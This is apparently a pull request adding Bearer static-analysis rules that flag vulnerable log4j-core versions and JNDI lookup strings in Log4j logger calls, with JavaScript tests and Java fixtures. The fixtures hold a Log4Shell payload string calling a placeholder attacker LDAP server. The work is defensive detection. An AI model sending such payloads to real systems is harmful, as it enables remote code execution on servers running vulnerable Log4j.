### PR TITLE
feat(java): log4j rules

### DIFF
--- a/.github/workflows/canary_integration_tests.yml
+++ b/.github/workflows/canary_integration_tests.yml
@@ -30,6 +30,7 @@ jobs:
             "java/lang",
             "java/spring",
             "java/android",
+            "java/third_parties",
             "php/lang",
             "php/symfony",
             "php/third_parties",

--- a/.github/workflows/integration_tests.yml
+++ b/.github/workflows/integration_tests.yml
@@ -37,6 +37,7 @@ jobs:
             "java/lang",
             "java/spring",
             "java/android",
+            "java/third_parties",
             "php/lang",
             "php/symfony",
             "php/third_parties",

--- a/rules/java/lang/log4j.yml
+++ b/rules/java/lang/log4j.yml
@@ -1,0 +1,42 @@
+patterns:
+  - pattern: $<LOG_MANAGER>.$<GET_METHOD>();
+    filters:
+      - variable: LOG_MANAGER
+        regex: \A(org\.apache\.logging\.log4j\.)?LogManager\z
+      - variable: GET_METHOD
+        values:
+          - getLogger
+          - getFormatterLogger
+dependency_check: true
+dependency:
+  name: log4j-core
+  min_version: 2.17.0
+  filename: maven-dependencies.json
+languages:
+  - java
+metadata:
+  description: Usage of vulnerable Log4j library
+  remediation_message: |
+    ## Description
+
+    Versions of log4j-core older than 2.17.1 (for Java 8) are susceptible to remote code execution attacks,
+    owing to a deserialization vulnerability in the library's JNDI (Java Naming and Directory Interface) lookup feature.
+
+    ## Remediations
+
+    ✅ Upgrade log4j-core to version 2.17.1 or above
+
+    ✅ Set the `log4j2.formatMsgNoLookups` system property to TRUE to disable lookups
+
+    ```java
+      System.setProperty("log4j2.formatMsgNoLookups", "true");
+    ```
+
+    ## References
+
+    - [Log4j Security](https://logging.apache.org/log4j/2.x/security.html)
+
+  cwe_id:
+    - 917
+  id: java_lang_log4j
+  documentation_url: https://docs.bearer.com/reference/rules/java_lang_log4j

--- a/rules/java/lang/log4j_jndi_lookup.yml
+++ b/rules/java/lang/log4j_jndi_lookup.yml
@@ -1,0 +1,55 @@
+patterns:
+  - pattern: $<LOGGER>.$<METHOD>($<JNDI_LOOKUP_STRING>);
+    filters:
+      - variable: LOGGER
+        detection: java_lang_log4j_jndi_lookup_logger
+      - variable: METHOD
+        values:
+          - debug
+          - error
+          - info
+          - warn
+      - variable: JNDI_LOOKUP_STRING
+        string_regex: \A\${jndi\:.+}\z
+auxiliary:
+  - id: java_lang_log4j_jndi_lookup_logger
+    patterns:
+      - pattern: $<LOGGER>.$<GET_METHOD>();
+        filters:
+          - variable: LOGGER
+            regex: \A(org\.apache\.logging\.log4j\.)?LogManager\z
+          - variable: GET_METHOD
+            values:
+              - getLogger
+              - getFormatterLogger
+severity: warning
+languages:
+  - java
+metadata:
+  description: Usage of lookup in log4j logger string
+  remediation_message: |
+    ## Description
+
+    In the past, log payloads containing JNDI (Java Naming and Directory Interface) lookups have been used for
+    remote code execution with the Log4j library.
+
+    Such lookups should only be permitted if they are strickly necessary.
+
+    ## Remediations
+
+    ❌ Avoid permitting JNDI lookups for logging purposes
+
+    ✅ Set the `log4j2.formatMsgNoLookups` system property to TRUE to disable lookups
+
+    ```java
+      System.setProperty("log4j2.formatMsgNoLookups", "true");
+    ```
+
+    ## References
+
+    - [Log4j Security](https://logging.apache.org/log4j/2.x/security.html)
+
+  cwe_id:
+    - 917
+  id: java_lang_log4j_jndi_lookup
+  documentation_url: https://docs.bearer.com/reference/rules/java_lang_log4j_jndi_lookup

--- a/tests/helper.js
+++ b/tests/helper.js
@@ -94,6 +94,9 @@ FORMAT=jsonv2 bearer scan ${testBase} --only-rule ${ruleId} --log-level trace`
 
     results = JSON.parse(out)
 
+    console.log("Results: ")
+    console.log(results);
+
     let findings = []
     if (results.findings != null) {
       for (const result of results.findings) {

--- a/tests/java/lang/log4j/test.js
+++ b/tests/java/lang/log4j/test.js
@@ -1,0 +1,27 @@
+const {
+  createNewInvoker,
+  getEnvironment,
+} = require("../../../helper.js")
+const { ruleId, ruleFile, testBase } = getEnvironment(__dirname)
+
+describe(ruleId, () => {
+  const invoke = createNewInvoker(ruleId, ruleFile, testBase)
+
+  test("log4j_secure", () => {
+    const testCase = "secure/"
+
+    const results = invoke(testCase)
+
+    expect(results.Missing).toEqual([])
+    expect(results.Extra).toEqual([])
+  })
+
+  test("log4j_insecure", () => {
+    const testCase = "insecure/"
+
+    const results = invoke(testCase)
+
+    expect(results.Missing).toEqual([])
+    expect(results.Extra).toEqual([])
+  })
+})

--- a/tests/java/lang/log4j/testdata/insecure/main.java
+++ b/tests/java/lang/log4j/testdata/insecure/main.java
@@ -1,0 +1,15 @@
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+
+public class Foo {
+  // bearer:expected java_lang_log4j
+  private static final Logger LOGGER = LogManager.getLogger(Foo.class);
+
+  // public static void bad() {
+  //   LOGGER.info("${jndi:ldap://attacker-server:1389/Exploit}");
+  // }
+
+  public static void bad2() {
+    LOGGER.info("outdated version of log4j vulnerability");
+  }
+}

--- a/tests/java/lang/log4j/testdata/insecure/main.java
+++ b/tests/java/lang/log4j/testdata/insecure/main.java
@@ -5,10 +5,6 @@ public class Foo {
   // bearer:expected java_lang_log4j
   private static final Logger LOGGER = LogManager.getLogger(Foo.class);
 
-  // public static void bad() {
-  //   LOGGER.info("${jndi:ldap://attacker-server:1389/Exploit}");
-  // }
-
   public static void bad2() {
     LOGGER.info("outdated version of log4j vulnerability");
   }

--- a/tests/java/lang/log4j/testdata/insecure/maven-dependencies.json
+++ b/tests/java/lang/log4j/testdata/insecure/maven-dependencies.json
@@ -1,0 +1,16 @@
+{
+  "dependencies": [
+    {
+      "groupId": "org.apache.logging.log4j",
+      "artifactId": "log4j-api",
+      "version": "2.15.0",
+      "scope": "compile"
+    },
+    {
+      "groupId": "org.apache.logging.log4j",
+      "artifactId": "log4j-core",
+      "version": "2.17.0",
+      "scope": "compile"
+    }
+  ]
+}

--- a/tests/java/lang/log4j/testdata/secure/main.java
+++ b/tests/java/lang/log4j/testdata/secure/main.java
@@ -1,0 +1,10 @@
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+
+public class Foo {
+  private static final Logger LOGGER = LogManager.getLogger(Foo.class);
+
+  public static void bad2() {
+    LOGGER.info("ok");
+  }
+}

--- a/tests/java/lang/log4j/testdata/secure/maven-dependencies.json
+++ b/tests/java/lang/log4j/testdata/secure/maven-dependencies.json
@@ -1,0 +1,16 @@
+{
+  "dependencies": [
+    {
+      "groupId": "org.apache.logging.log4j",
+      "artifactId": "log4j-api",
+      "version": "2.15.0",
+      "scope": "compile"
+    },
+    {
+      "groupId": "org.apache.logging.log4j",
+      "artifactId": "log4j-core",
+      "version": "2.17.1",
+      "scope": "compile"
+    }
+  ]
+}

--- a/tests/java/lang/log4j_jndi_lookup/test.js
+++ b/tests/java/lang/log4j_jndi_lookup/test.js
@@ -1,0 +1,18 @@
+const {
+  createNewInvoker,
+  getEnvironment,
+} = require("../../../helper.js")
+const { ruleId, ruleFile, testBase } = getEnvironment(__dirname)
+
+describe(ruleId, () => {
+  const invoke = createNewInvoker(ruleId, ruleFile, testBase)
+
+  test("log4j_jndi_lookup", () => {
+    const testCase = "main.java"
+
+    const results = invoke(testCase)
+
+    expect(results.Missing).toEqual([])
+    expect(results.Extra).toEqual([])
+  })
+})

--- a/tests/java/lang/log4j_jndi_lookup/testdata/main.java
+++ b/tests/java/lang/log4j_jndi_lookup/testdata/main.java
@@ -1,0 +1,22 @@
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+
+public class Foo {
+  private static final Logger LOGGER = LogManager.getLogger(Foo.class);
+
+  public static void bad() {
+    // bearer:expected java_lang_log4j_jndi_lookup
+    LOGGER.info("${jndi:ldap://attacker-server:1389/Exploit}");
+  }
+
+
+  public static void bad2() {
+    String malicious = "${jndi:ldap://attacker-server:1389/Exploit}";
+    // bearer:expected java_lang_log4j_jndi_lookup
+    LOGGER.info(malicious);
+  }
+
+  public static void ok() {
+    LOGGER.info("${not-jndi}");
+  }
+}


### PR DESCRIPTION
## Description

Add two rules to catch Log4j instances

* Dependency rule to catch Log4j core libraries less than 2.17.1. For earlier versions of Java 6 and Java 7, [the vulnerability is fixed in earlier versions](https://logging.apache.org/log4j/2.x/security.html#vulnerabilities) 2.3.2 and 2.12.4 respectively, but we focus on Java 8. 
* Warning-level rule to catch lookup strings with Log4j logger methods. This was the root cause of the vulnerability and shouldn't be done unless necessary

Relates to #197 

<!-- Add this section if required
## Related
-->
<!-- Closes some existing issue
- Close #AAA
<!-- References some existing PR
- #CCC
-->

## Checklist

- [ ] I've added a snapshot that shows my rule works as expected.
- [ ] My rule has adequate metadata to explain its use.
- [ ] PR title follows [Conventional Commits](https://www.conventionalcommits.org/) format
